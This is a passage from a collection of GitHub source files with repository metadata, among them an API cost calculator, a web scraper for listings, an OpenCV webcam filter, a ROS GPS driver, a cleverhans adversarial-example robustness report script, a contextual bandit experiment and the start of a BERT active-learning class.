+{"seq_id":"13759335779","text":"import argparse\r\n\r\ndef calculate_cost(version, tokens):\r\n    cost_per_thousand = {\r\n        'gpt3.5t': 0.002,\r\n        'gpt4': 0.03\r\n    }\r\n\r\n    if version not in cost_per_thousand:\r\n        print(f\"Invalid version: {version}\")\r\n        return\r\n\r\n    cost = (tokens / 1000) * cost_per_thousand[version]\r\n\r\n    print(f\"The cost for {tokens} tokens using {version} is ${cost:.2f}\")\r\n\r\nif __name__ == \"__main__\":\r\n    parser = argparse.ArgumentParser(description='Calculate API token costs.')\r\n    parser.add_argument('version', type=str, help='The API version. Either \"gpt3.5t\" or \"gpt4\".')\r\n    parser.add_argument('tokens', type=int, help='The number of tokens.')\r\n    \r\n    args = parser.parse_args()\r\n\r\n    calculate_cost(args.version, args.tokens)\r\n","repo_name":"NickWithBotronics/OpenAI-API-Calculator","sub_path":"Script.py","file_name":"Script.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"32044995359","text":"from bs4 import BeautifulSoup\nimport requests\nimport time\n\n\nurl = 'http://bj.58.com/pbdn/?PGTID=0d100000-0000-1121-f41b-137aeef068b7&ClickID=6'\n\nurl1 = 'http://jst1.58.com/counter?infoid='\n\n\n#u1 = 'http://bj.58.com/pingbandiannao/24063001373753x.shtml?adtype=1&PGTID=0d305a36-0000-15fc-9fd4-6d9b525b011f&entinfo=24063001373753_0&psid=115136530190322804712479354&iuType=q_2&ClickID=13'\n\n\n\n\n\ndef get_JS_link(content1,content2):\n\n    startIndex = content1.index('entinfo') + 8\n    endIndex = startIndex + 14\n    JS_link = content2 + content1[startIndex:endIndex]\n    return (JS_link)\n\n\n\ndef get_viewCount(url):\n    web_data = requests.get(url)\n    soup = BeautifulSoup(web_data.text, 'lxml')\n    views = soup.select('body')\n    count = str(views[0])\n    start = count.index('total') + 6\n    end = count.index('\n\n')\n    viewCount = count[start: end]\n    return viewCount\n\n\n\ndef get_detailedInfo(url, detailedData=None):\n\n    web_data = requests.get(url)\n    soup = BeautifulSoup(web_data.text, 'lxml')\n\n    dates = soup.select('ul.mtit_con_left.fl > li.time')\n    prices = soup.select('div.person_add_top.no_ident_top > div.per_ad_left > div.col_sub.sumary > ul > li > div.su_con > span.price.c_f50')\n    types = soup.select('div.num_tan > div.num_tan_in > div.num_tan_main > div.num_tan_text > p.c_666 > span.red')\n    areas = soup.select('div.person_add_top.no_ident_top > div.per_ad_left > div.col_sub.sumary > ul > li > div.su_con > span > a:nth-of-type(1)')\n\n    decide = soup.select('div.person_add_top.no_ident_top > div.per_ad_left > div.col_sub.sumary > ul > li > div.su_tit')\n\n    list=[]\n    for dec in decide:\n        dec = dec.get_text()\n        list.append(str(dec[0:2]))\n\n    if detailedData==None:\n\n        if '区域' in list:\n\n            for date, price, type, area in zip(dates, prices, types,areas):\n\n                view_url = get_JS_link(url,url1)\n                viewCount = get_viewCount(view_url)\n\n                type = type.get_text().strip()\n\n                if len(type[1:-1]) == 0:\n                    detailedData = {\n                        'viewCount': viewCount,\n                        'date': date.get_text(),\n                        'price': price.get_text(),\n                        'type': '个人',\n                        'area': area.get_text()\n                    }\n                else:\n                    detailedData = {\n                        'viewCount': viewCount,\n                        'date': date.get_text(),\n                        'price': price.get_text(),\n                        'type': type[1: -1],\n                        'area': area.get_text()\n                    }\n\n            return detailedData\n\n        else:\n\n            for date, price, type in zip(dates, prices, types):\n\n                view_url = get_JS_link(url,url1)\n                viewCount = get_viewCount(view_url)\n\n                type = type.get_text().strip()\n\n                if len(type[1:-1]) == 0:\n                    detailedData = {\n                        'viewCount': viewCount,\n                        'date': date.get_text(),\n                        'price': price.get_text(),\n                        'type': '个人',\n                        'area': 'not mentioned'\n                    }\n                else:\n                    detailedData = {\n                        'viewCount': viewCount,\n                        'date': date.get_text(),\n                        'price': price.get_text(),\n                        'type': type[1:-1],\n                        'area': 'not mentioned'\n                    }\n\n            return detailedData\n\n\n\ndef get_info(url, data=None):\n\n    time.sleep(2)\n    n = 0\n\n    web_data = requests.get(url)\n    soup = BeautifulSoup(web_data.text, 'lxml')\n    titles = soup.select('td.t > a.t')\n\n    if data==None:\n        for title in titles:\n\n            data = {\n                'title': title.get_text().strip()\n            }\n\n            homepage = title.get('href')\n            detailedData = get_detailedInfo(homepage)\n\n            print(data)\n            print(detailedData)\n            n += 1\n            print (n, '--------------------------------------------- \\n')\n\n\nget_info(url)\n\n","repo_name":"circlechai/Plan-for-combating","sub_path":"week1大作业提交/litong/58.py","file_name":"58.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"}
+{"seq_id":"5123868044","text":"#----condiciones---#\nmensaje_binevenida = \"hola que se dice pa \"\nmensaje_mayor = \" a es mayor \"\nmensaje_menor =\"a es menor \"\nmensaje_igual = \" son igual \"\n\nMENSAJE_A = \"ingrese un numero A :\"\nMENSAJE_B= \"ingrese un numero B: \"\n#----CODIGO----\nprint (mensaje_binevenida)\nA = int (input (MENSAJE_A))\nB = int (input (MENSAJE_B))\nismayor = A > B\nismenor = A < B\nisigusl = A == B\nresultado = \"\"\nif (ismayor):\n    print (mensaje_mayor)\nelif (ismenor):\n    print (mensaje_menor)\nelse :\n    print (mensaje_igual)\n\nprint (resultado)\n\n\n\n\n","repo_name":"geronimo0630/2021","sub_path":"talleres/estudioparcial1.1.py","file_name":"estudioparcial1.1.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"6279943962","text":"from datetime import date\nimport cv2\nimport numpy\n\n# img = cv2.imread('./src/img/image.jpeg')\n\n# img = cv2.resize(img, (img.shape[1]*2, img.shape[0]*2))\n\n# img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n\n# # img = cv2.GaussianBlur(img, (15, 15), 0)\n\n# cv2.imshow('kitten',img)\n\n\n# cv2.waitKey(0)\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n success, img = cap.read()\n img = cv2.resize(img, (1280, 720))\n img = cv2.rotate(img, cv2.ROTATE_180)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n img = cv2.Canny(img, 15, 15)\n kernel = numpy.ones((3,3), numpy.uint8)\n img = cv2.dilate(img, kernel, iterations=1)\n\n img = cv2.erode(img, kernel, iterations=1)\n\n cv2.imshow('ok', img)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break","repo_name":"fenix1851/OpenCV-course","sub_path":"test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"1919349046","text":"import argparse\n#import pyprofiler\n\ndef read_large_file(file):\n with open(file) as f:\n for line in f:\n yield line\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Read a large file efficiently\")\n parser.add_argument('filename', help='filename')\n args = parser.parse_args()\n #profiler = pyprofiler.start_profile()\n reader = read_large_file(args.filename)\n while True:\n try:\n print(next(reader))\n except StopIteration:\n break\n #pyprofiler.end_profile(profiler)\n","repo_name":"earankyk/snippets","sub_path":"large_file.py","file_name":"large_file.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33458181423","text":"\n\nimport numpy as np\nimport pandas as pd\nimport time\nimport matplotlib.pyplot as plt\nimport geopy.distance\nimport ast\nimport nltk\nimport math\nnltk.download('punkt')\nnltk.download('stopwords')\nfrom nltk.corpus import stopwords\nimport string\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn import datasets\nfrom scipy.special import expit\nimport random\n\n\nad = pd.read_csv('ads.csv',encoding='iso-8859-1')[:50]\nsrch = pd.read_csv('search.csv',encoding='iso-8859-1')[:10000]\n\nclass Search:\n def __init__(self,search):\n self.n = len(search)\n self.loc = search[['Latitude', 'Longitude']]\n self.text = search[['SearchParams', 'SearchQuery']]\n self.corp = [ [i for i in nltk.word_tokenize(sent.lower()) if i not in Operations.stop()] for sent in self.text.apply(Operations.vectorize,axis=1).tolist()]\n self.budget = search.Budget.tolist()\n self.t = 0\n \n def getNextRow(self):\n self.t+=1\n return (self.loc.iloc[self.t-1], self.corp[self.t-1], self.budget[self.t-1])\n \n def getRow(self, index):\n return (self.loc[index], self.corp[index], self.budget[index])\n\nclass Ads:\n def __init__(self,ads):\n self.n = len(ads)\n self.loc = ads[['Latitude', 'Longitude']]\n self.text = ads[['Params', 'Title']]\n self.corp = [ [i for i in nltk.word_tokenize(sent.lower()) if i not in Operations.stop()] for sent in self.text.apply(Operations.vectorize,axis=1).tolist()]\n self.price = ads.Price.tolist()\n \n def getRow(self, index):\n return (self.loc.iloc[index], self.corp[index], self.price[index])\n\nclass Context:\n def __init__(self):\n arrs = np.load('arrs.npy')\n words = np.load('words.npy')\n self.vec_dict = dict(zip(words, arrs)) \n global ad \n self.ads = Ads(ad)\n self.ad_centroids = 
[self.computeCentroid(self.ads.getRow(i)[1]) for i in range(self.ads.n)]\n self.max_geo_distance=Operations.computeDistance(50,30,70,140)\n global srch\n self.max_srch_budget=max(srch.Budget)\n #global srch\n self.min_srch_budget=min(srch.Budget)\n self.max_ad_price=max(self.ads.price)\n self.min_ad_price=min(self.ads.price)\n self.weights = np.array([5, 2, 1])\n self.w_sum = sum(self.weights)\n \n def computeCentroid(self,query):\n return np.mean(np.array([self.vec_dict[word] for word in query]), axis = 0)\n \n def getContext(self,ad_id,search_tuple):\n \n centroidDistance = 1 - self.getCentroidDistance(ad_id,search_tuple[1])\n if centroidDistance < 0:\n centroidDistance = 0\n return np.array([(self.weights[0]/self.w_sum)*centroidDistance, (self.weights[1]/self.w_sum)*(1-self.getLocationDistance(ad_id,search_tuple[0])), (self.weights[2]/self.w_sum)*(1-self.getBudgetDistance(ad_id,search_tuple[2]))])\n \n \n def getCentroidDistance(self, ad_id,query):\n query_centroid=self.computeCentroid(query)\n return np.linalg.norm(query_centroid-self.ad_centroids[ad_id]) #(np.sqrt(len(query_centroid)*4)\n \n def getLocationDistance(self, ad_id,search_location):\n ad_location=self.ads.getRow(ad_id)[0]\n distance=Operations.computeDistance(ad_location[0],ad_location[1],search_location[0],search_location[1])\n return distance/self.max_geo_distance\n \n def getBudgetDistance(self, ad_id,search_budget):\n return np.linalg.norm(search_budget-self.ads.getRow(ad_id)[2])/(max(self.max_srch_budget-self.min_ad_price, self.max_ad_price-self.min_srch_budget))\n\nclass Bandit(object):\n\n def generate_reward(self, i):\n raise NotImplementedError\n\n\nclass BernoulliBandit(Bandit):\n\n def __init__(self, n=10):\n global ad\n self.ads=ad\n self.n = n\n self.d = 3\n #self.theta = np.random.rand(self.d, self.n)\n self.bias, self.theta=self.generate_thetas()\n self.x = np.random.rand(self.d, self.n)\n print ('\\n\\noptimal theta :\\n', self.theta)\n #print ('\\n\\nproduct : \\n', (np.matmul(np.transpose(self.x), self.theta)*np.eye(self.n)).sum(axis = 0))\n self.avg_reward = [0 for _ in range(self.n)]\n self.counts = [0 for _ in range(self.n)]\n self.m = int(0.1*len(self.ads))\n \n\n def generate_reward(self, i_arr, x, sleep):\n\n proba_vector=expit((np.matmul(np.transpose(x), self.theta)*np.eye(self.n)).sum(axis = 0)+self.bias)\n proba_vector = proba_vector * sleep\n best_probas = np.sort(proba_vector)[::-1][:self.m]\n rewards = np.array([1 if np.random.random() < proba_vector[i] else 0 for i in i_arr])\n chosen_probas = np.array([proba_vector[i] for i in i_arr])\n \n return rewards, sum(best_probas) - sum(chosen_probas)\n \n def generate_thetas(self): \n ctrs=[x*50 for x in self.ads.HistCTR.tolist()]\n\n context = Context()\n thetas = np.zeros((self.d,self.n))\n w = [1,1,1]\n w_sum = sum(w)\n bias = np.zeros(self.n)\n for i in range(self.n):\n res = math.log(ctrs[i]/(1-ctrs[i]))\n thetas[:, i] = [weight/w_sum for weight in w] \n bias[i] = res - np.dot(context.weights,thetas[:,i])/context.w_sum\n return bias,thetas\n\nclass Operations:\n \n @staticmethod\n def vectorize(row):\n cell=row[0]\n vector=[]\n if cell is not None:\n cell = ast.literal_eval(cell)\n assert(type(cell)==dict)\n \n vector=list(cell.values())\n if row[1] is not None:\n vector.append(row[1])\n \n return \" \".join(vector).lower()\n\n \n @staticmethod\n def computeDistance(lat1, long1, lat2, long2):\n coords_1 = (lat1, long1)\n coords_2 = (lat2, long2)\n\n return geopy.distance.distance(coords_1,coords_2).km\n \n @staticmethod\n def stop():\n return 
stopwords.words('english') + list(string.punctuation) + [\"''\", \"'s\"]\n\nclass LogisticUCB(object):\n def __init__(self, bandit, dimensions=3, delta=1):\n \"\"\"\n bandit (Bandit): the target bandit to solve.\n \"\"\"\n assert isinstance(bandit, BernoulliBandit)\n np.random.seed(int(time.time()))\n\n self.bandit = bandit\n\n #self.chosen_arms = [] # A list of machine ids, 0 to bandit.n-1.\n self.regret = 0. # Cumulative regret.\n self.regrets = [0.] # History of cumulative regret.\n self.k = self.bandit.n\n self.d = dimensions\n self.t = 0\n \n self.theta = np.zeros((self.d,self.k)) \n self.p = np.zeros(self.k)\n self.r = [np.random.random()/10 for _ in range(self.k)]\n self.alpha = 1.1 #+ np.sqrt(np.log(2/delta)/2)\n self.eta = 10000\n\n self.x = np.zeros((self.d, self.k))\n self.q = [0 for _ in range(self.k)]\n self.d_csmab = [0 for _ in range(self.k)]\n self.logregs = [LogisticRegression(C=1e7, solver='lbfgs') for _ in range(self.k)]\n self.q_tanh = [0 for _ in range(self.k)]\n \n #print ('\\n\\nx : \\n', self.x)\n #print ('search')\n \n \n self.counts = [2 for _ in range(self.k)]\n global srch\n self.search = Search(srch)\n self.context = Context()\n self.A = np.array([np.identity(self.d) for _ in range(self.k)])\n \n \n def update_regret(self, diff):\n self.regret += diff/len(self.bandit.ads)\n self.regrets.append(self.regret)\n\n @property\n def estimated_probas(self):\n raise NotImplementedError\n\n def run_one_step(self):\n \"\"\"Return the machine index to take action on.\"\"\"\n self.t += 1\n \n #self.x = np.random.rand(self.d,self.k)\n query = self.search.getNextRow()\n\n while True:\n self.sleep = np.array([random.choice([0, 1, 1, 1]) for _ in range(self.bandit.n)])\t\n if(sum(self.sleep)>0):\n break\n \n for i in range(self.bandit.n):\n self.q[i] = max(0, (self.q[i] + self.r[i]*sum(self.x[:,i]) - self.d_csmab[i]))\n \n self.q_tanh = np.tanh(self.q)\n self.x = np.transpose(np.array([self.context.getContext(i, query) for i in range(self.k)]))\n\n logreg_score=[0 for _ in range(self.k)]\n for i in range(self.k):\n inverse=np.linalg.inv(self.A[i])\n if self.counts[i]!=2:\n self.p[i] = self.eta*expit(np.dot(self.x[:, i], np.ravel(self.logregs[i].coef_))+self.logregs[i].intercept_)\n logreg_score[i]=self.p[i]\n\n self.p[i] += self.eta*self.alpha*(np.sqrt(np.matmul(np.matmul(np.transpose(self.x[:,i]),inverse),self.x[:,i]))) + self.q_tanh[i]*sum(self.x[:,i])\n else:\n #self.p[i] = self.alpha*(np.sqrt(np.matmul(np.matmul(np.transpose(self.x[:,i]),np.eye(self.d)),self.x[:,i])))\n self.p[i] = self.eta*self.alpha*(np.sqrt(np.matmul(np.matmul(np.transpose(self.x[:,i]),inverse),self.x[:,i]))) + self.q_tanh[i]*sum(self.x[:,i])\n \n self.p = np.multiply(self.p, self.sleep) \n \n chosen_array = np.array(self.p.argsort()[-min(self.bandit.m, sum(self.sleep)):][::-1])\n #print(\"Chosen \", chosen_array)\n for chosen in chosen_array:\n self.A[chosen] = self.A[chosen] + np.matmul(np.reshape(self.x[:,chosen],(self.d,1)), np.reshape(self.x[:,chosen],(1,self.d)))\n self.d_csmab = [1 if _ in chosen_array else 0 for _ in range(self.k)]\n \n rewards, diff = self.bandit.generate_reward(chosen_array, self.x, self.sleep)\n self.train_update(chosen_array, rewards) \n return diff\n \n def train_update(self, chosen_array, rewards):\n for chosen in chosen_array:\n self.counts[chosen] += 1\n count = self.counts[chosen]\n self.trains[chosen][:,count-1] = self.x[:,chosen]\n self.tests[chosen][count-1] = rewards[np.argwhere(chosen_array == chosen)[0]]\n self.X_train = self.trains[chosen][:, :count]\n 
self.y_train = self.tests[chosen][:count]\n self.logregs[chosen] = LogisticRegression(C=1e7, solver='lbfgs')\n self.logregs[chosen].fit(np.transpose(self.X_train), self.y_train)\n \n \n def run(self, num_steps):\n assert self.bandit is not None\n self.time_steps = num_steps\n self.trains = np.array([np.zeros((self.d, num_steps+1)) for _ in range(self.k)])\n self.tests = np.array([np.zeros((num_steps+1)) for _ in range(self.k)])\n for k in range(self.k):\n self.trains[k,:,0] = self.context.weights/self.context.w_sum\n self.tests[k,0]=1\n if num_steps>self.search.n:\n num_steps = self.search.n\n for _ in range(num_steps):\n #if _%1000==0:\n print('\\n\\n\\nstep : ', _+1 )\n diff = self.run_one_step()\n\n self.update_regret(diff)\n\ndef plot_results(regrets):\n\n fig = plt.figure(figsize=(10, 10))\n fig.subplots_adjust(bottom=0.3, wspace=0.3)\n\n ax1 = fig.add_subplot(111)\n ax1.plot(range(len(regrets)), regrets)\n\n ax1.set_xlabel('Time step')\n ax1.set_ylabel('Cumulative Regret')\n #ax1.legend(loc=9, bbox_to_anchor=(1.82, -0.25), ncol=5)\n ax1.legend(loc = 'best')\n ax1.grid('k', ls='--', alpha=0.3)\n\n plt.show()\n\nk = BernoulliBandit(n = len(ad))\n\nucb = LogisticUCB(k)\n\nucb.run(100)\n\nplot_results(ucb.regrets)\n","repo_name":"shreyasar2202/Multi-Armed-Bandits","sub_path":"CSMAB_F.py","file_name":"CSMAB_F.py","file_ext":"py","file_size_in_byte":11029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19567519213","text":"#!/usr/bin/env python3\n\nimport rospy\nimport serial\nimport utm\nfrom std_msgs.msg import Float64, Header, Int32, String\nfrom lab4.msg import gps_msg\n\n\nif __name__ == \"__main__\":\n\tSENSOR_NAME = \"GPS_PUCK\"\n\trospy.init_node(\"GPS_node\")\n\tserial_port = rospy.get_param('~port', '/dev/ttyUSB1')\n\tserial_baud = rospy.get_param('~baudrate', 4800)\n\t\n\tport = serial.Serial(serial_port, serial_baud, timeout=3.)\n\trospy.logdebug(\"Using GPS puck on port \" + serial_port + \" at \" + str(serial_baud))\n\t\n\tpub = rospy.Publisher(\"GPS_data\", gps_msg, queue_size=10)\n\n\t\n\ttry:\n\t\twhile not rospy.is_shutdown():\n\t\t\tline = port.readline()\n\n\t\t\tif line.startswith(b'$GPGGA'):\n\t\t\t\tline = str(line).split(\",\")\n\t\t\t\tmsg = gps_msg()\n\t\t\t\tif (line[2] == \"\"):\n\t\t\t\t\tcontinue;\n\t\t\t\tlat = float(line[2]) / 100.0\n\t\t\t\tlon = -float(line[4]) / 100 # plz dont take marks off grader, imma be in the western hemisphere for a while\n\t\t\t\talt = float(line[9])\n\t\t\t\t\n\n\t\t\t\t[easting, northing, zone, letter] = utm.from_latlon(lat, lon)\n\n\t\t\t\tmsg.lat = lat\n\t\t\t\tmsg.lon = lon\n\t\t\t\tmsg.alt = alt\n\t\t\t\tmsg.utm_easting = easting\n\t\t\t\tmsg.utm_northing = northing\n\t\t\t\tmsg.zone = zone\n\t\t\t\tmsg.letter = letter\n\t\t\t\t\n\t\t\t\tpub.publish(msg)\n\n\t\t\t\t\n\t\t\t\tprint(f\"lat, long, alt: {lat}, {lon}, {alt}\")\n\t\t\t\tprint(f\"easting, northing: {easting}, {northing}\")\n\t\t\t\tprint(f\"zone and letter: {zone}{letter}\")\n\t\t\t\t\n\texcept rospy.ROSInterruptException:\n\t\tport.close()\n\t\t\n\t\t\n\t\t\n\t\t\n","repo_name":"SumeghaS/Robot-Sensing-and-Navigation","sub_path":"Navigation_Stack/src/driver/scripts/gps_driver.py","file_name":"gps_driver.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72232653664","text":"#!/usr/bin/env python3\n\"\"\"\nmake_confidence_report_bundle_examples.py\nUsage:\n make_confidence_report_bundle_examples.py 
model.joblib a.npy\n make_confidence_report_bundle_examples.py model.joblib a.npy b.npy c.npy\n\n where model.joblib is a file created by cleverhans.serial.save containing\n a picklable cleverhans.model.Model instance and each examples_i.npy is\n a saved numpy array containing adversarial examples for a whole dataset.\n Usually example_i.npy is the output of make_confidence_report.py or\n make_confidence_report_bundled.py.\n\nThis script uses max-confidence attack bundling\n( https://openreview.net/forum?id=H1g0piA9tQ )\nto combine adversarial example datasets that were created earlier.\nIt will save a ConfidenceReport to to model_bundled_examples_report.joblib.\nThe report can be later loaded by another\nscript using cleverhans.serial.load.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport warnings\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom cleverhans.utils_tf import silence\n\n# We need to disable pylint's complaints about import order because `silence`\n# works only if it is called before the other imports.\n# pylint: disable=C0413\nsilence()\nfrom cleverhans.attack_bundling import bundle_examples_with_goal, MaxConfidence\nfrom cleverhans import serial\nfrom cleverhans.compat import flags\nfrom cleverhans.confidence_report import BATCH_SIZE\nfrom cleverhans.confidence_report import TRAIN_START, TRAIN_END\nfrom cleverhans.confidence_report import TEST_START, TEST_END\nfrom cleverhans.confidence_report import WHICH_SET\n\n\nFLAGS = flags.FLAGS\n\n\ndef main(argv=None):\n \"\"\"\n Make a confidence report and save it to disk.\n \"\"\"\n assert len(argv) >= 3\n _name_of_script = argv[0]\n model_filepath = argv[1]\n adv_x_filepaths = argv[2:]\n\n sess = tf.Session()\n with sess.as_default():\n model = serial.load(model_filepath)\n\n factory = model.dataset_factory\n factory.kwargs[\"train_start\"] = FLAGS.train_start\n factory.kwargs[\"train_end\"] = FLAGS.train_end\n factory.kwargs[\"test_start\"] = FLAGS.test_start\n factory.kwargs[\"test_end\"] = FLAGS.test_end\n dataset = factory()\n\n adv_x_list = [np.load(filepath) for filepath in adv_x_filepaths]\n x, y = dataset.get_set(FLAGS.which_set)\n for adv_x in adv_x_list:\n assert adv_x.shape == x.shape, (adv_x.shape, x.shape)\n # Make sure these were made for the right dataset with right scaling\n # arguments, etc.\n assert adv_x.min() >= 0.0 - dataset.kwargs[\"center\"] * dataset.max_val\n assert adv_x.max() <= dataset.max_val\n data_range = dataset.max_val * (1.0 + dataset.kwargs[\"center\"])\n\n if adv_x.max() - adv_x.min() <= 0.8 * data_range:\n warnings.warn(\n \"Something is weird. Your adversarial examples use \"\n \"less than 80% of the data range.\"\n \"This might mean you generated them for a model with \"\n \"inputs in [0, 1] and are now using them for a model \"\n \"with inputs in [0, 255] or something like that. 
\"\n \"Or it could be OK if you're evaluating on a very small \"\n \"batch.\"\n )\n\n report_path = FLAGS.report_path\n if report_path is None:\n suffix = \"_bundled_examples_report.joblib\"\n assert model_filepath.endswith(\".joblib\")\n report_path = model_filepath[: -len(\".joblib\")] + suffix\n\n goal = MaxConfidence()\n bundle_examples_with_goal(\n sess, model, adv_x_list, y, goal, report_path, batch_size=FLAGS.batch_size\n )\n\n\nif __name__ == \"__main__\":\n flags.DEFINE_string(\"report_path\", None, \"Report path\")\n flags.DEFINE_integer(\n \"train_start\",\n TRAIN_START,\n \"Starting point (inclusive)\" \"of range of train examples to use\",\n )\n flags.DEFINE_integer(\n \"train_end\",\n TRAIN_END,\n \"Ending point (non-inclusive) \" \"of range of train examples to use\",\n )\n flags.DEFINE_integer(\n \"test_start\",\n TEST_START,\n \"Starting point \" \"(inclusive) of range of test examples to use\",\n )\n flags.DEFINE_integer(\n \"test_end\",\n TEST_END,\n \"End point (non-inclusive) of \" \"range of test examples to use\",\n )\n flags.DEFINE_string(\"which_set\", WHICH_SET, '\"train\" or \"test\"')\n flags.DEFINE_integer(\"batch_size\", BATCH_SIZE, \"batch size\")\n tf.app.run()\n","repo_name":"cleverhans-lab/cleverhans","sub_path":"cleverhans_v3.1.0/scripts/make_confidence_report_bundle_examples.py","file_name":"make_confidence_report_bundle_examples.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","stars":5963,"dataset":"github-code","pt":"7"} +{"seq_id":"74900854304","text":"import unittest\nfrom server import *\n\n\nclass TestServer(unittest.TestCase):\n def test_check_ip_localhost(self):\n self.assertEqual(check_ip('localhost'), 'localhost')\n\n def test_check_ip_incorrect(self):\n with self.assertRaises(ValueError) as e:\n check_ip('127.1000.0.1')\n the_exception = str(e.exception)\n self.assertEqual(the_exception, 'некорректный IP-адрес сервера')\n\n def test_check_port_correct(self):\n self.assertEqual(check_port(12000), 12000)\n\n def test_check_port_big(self):\n with self.assertRaises(ValueError) as e:\n check_port(65999)\n the_exception = str(e.exception)\n self.assertEqual(the_exception, 'некорректный tcp-порт')\n\n def test_msg_processing_correct(self):\n msg = {\n 'action': 'presence',\n 'time': '06-12-2022 12:00',\n 'user': {\n 'account_name': 'alla',\n 'status': 'online'\n }\n }\n self.assertEqual(msg_processing(msg), {'response': 200})\n\n def test_msg_processing_missing_field(self):\n msg = {\n 'action': 'presence',\n 'user': {\n 'account_name': 'alla',\n 'status': 'online'\n }\n }\n self.assertEqual(msg_processing(msg), {'response': 400, 'error': 'bad request'})\n\n def test_msg_conversion_dict(self):\n self.assertEqual(msg_conversion({'user': {'account_name': 'alla', 'status': 'online'}}),\n b'{\"user\": {\"account_name\": \"alla\", \"status\": \"online\"}}')\n\n def test_msg_conversion_bytes(self):\n self.assertEqual(msg_conversion(b'{\"user\": {\"account_name\": \"alla\", \"status\": \"online\"}}'),\n {'user': {'account_name': 'alla', 'status': 'online'}})\n\n def test_set_addr_port_all(self):\n test_argv = ['server.py', '-a', 'localhost', '-p', '8888']\n test_argv_change = ['server.py', '-p', '8888', '-a', 'localhost']\n self.assertEqual(set_addr_port(test_argv), ('localhost', 8888))\n self.assertEqual(set_addr_port(test_argv_change), ('localhost', 8888))\n\n def test_set_addr_port_incorrect_param(self):\n with self.assertRaises(SystemExit):\n test_argv = ['server.py', '-a', 'localhost', '-p']\n 
set_addr_port(test_argv)\n with self.assertRaises(SystemExit):\n test_argv = ['server.py', '-p', 'test', '-a', 'localhost']\n set_addr_port(test_argv)\n with self.assertRaises(SystemExit):\n test_argv = ['server.py', '-p', '333333', '-a', 'localhost']\n set_addr_port(test_argv)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"AllaSamoylik/Geek-University-Python2","sub_path":"Homework_4/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6741628719","text":"from celery.utils.log import get_task_logger\nfrom celery import shared_task\nfrom core.utils import fetch_quotes, parse_key\nfrom quotes.serializers import QuoteSerializer\n\n\nlogger = get_task_logger(__name__)\n\n\n@shared_task\ndef save_currency_quotes():\n logger.info('Running Currency Quotes Saving Task')\n\n # Fetch result from alphavantage\n response = fetch_quotes()\n\n # Clean up data\n currency_quote = response['Realtime Currency Exchange Rate']\n for key in list(currency_quote):\n new_key_name = parse_key(key)\n currency_quote[new_key_name] = currency_quote.pop(key)\n\n # Update our datastore\n quotes_serializer = QuoteSerializer(\n data=currency_quote)\n if quotes_serializer.is_valid():\n quotes_serializer.save()\n\n return 'Ok'\n","repo_name":"joshuachinemezu/coin-quotes","sub_path":"quotes/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"35363422393","text":"import os\nimport sys\nimport json\nimport torch\nimport logging\nimport numpy as np\nfrom torch import nn\nfrom transformers import AutoModelForSequenceClassification\nfrom sklearn.pipeline import Pipeline\nfrom skorch import NeuralNetClassifier\nfrom skorch.callbacks import LRScheduler, ProgressBar\nfrom skorch.hf import HuggingfacePretrainedTokenizer\nfrom torch.optim.lr_scheduler import LambdaLR\nfrom skorch.callbacks import EarlyStopping\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom sklearn.metrics import balanced_accuracy_score\nfrom modAL.models import ActiveLearner\nfrom modAL.uncertainty import uncertainty_sampling\n\n\n# Basic logging configuration\nlogging.basicConfig(format=\"%(asctime)s %(message)s\")\n\n\nclass BertModule(nn.Module):\n \"\"\"BERT model according to Skorch convention\"\"\"\n\n def __init__(self, name, num_labels):\n super().__init__()\n self.name = name\n self.num_labels = num_labels\n self.reset_weights()\n\n def reset_weights(self):\n self.bert = AutoModelForSequenceClassification.from_pretrained(\n self.name, num_labels=self.num_labels\n )\n\n def forward(self, **kwargs):\n pred = self.bert(**kwargs)\n return pred.logits\n\n\nclass ActiveBert:\n \"\"\"BERT active learner\n METHODS:\n query_loop: a continous loop for performing active learning.\n Continues until the pool is empty, or until user\n interrupt.\n lr_schedule: returns the learning rate based on current step\n calc_score: calculates f_1, precision, recall, accuracy and\n balanced accuracy\n predict: predicts input using model\n VARIABLES:\n dl: dataloader containing all datasets\n BATCH_SIZE: model batch size according to hyper parameters\n POOL_SAMPLE_SIZE: sample extracted from X_pool during each\n iteration of active learning\n \"\"\"\n\n def __init__(self, dl):\n \"\"\"initializes active learner, fitting data using parameters file\"\"\"\n self.dl = dl\n 
